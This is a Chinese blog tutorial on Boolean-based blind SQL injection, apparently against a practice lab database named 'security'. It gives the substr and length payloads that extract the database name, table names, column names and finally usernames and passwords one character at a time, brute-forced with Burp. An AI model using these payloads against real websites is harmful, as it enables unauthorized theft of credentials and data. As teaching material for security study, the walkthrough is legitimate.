您的当前位置:首页正文

Boolean注入攻击

来源:华拓网

Boolean注入攻击

爆库名

and length(database())>=1


返回正常

and length(database())>=10


返回错误
利用返回正常,返回错误进行注入

注:有些杠精又要说我直接用union联合注入不就行了,我在这里说明一下,我教的是Boolean注入



利用burp去跑一下,发现9报错,那就表明库的字段长度为8

and substr(database(),1,1)='x'

继续利用burp爆破库名的第一位值



第一位为s
数据库名不区分大小
以此类推爆8次即可
数据库为:security

爆表名

and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='x'


表名第一位为e
以此类推
表名
emails
referers
uagents
users

爆列名

and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='x'


列名第一位为i
以此类推
列名
id
username
password

爆内容

and substr((select username from users limit 0,1),1,1)='x'

and substr((select password from users limit 0,1),1,1)='x'

有什么不懂的可以在下面留言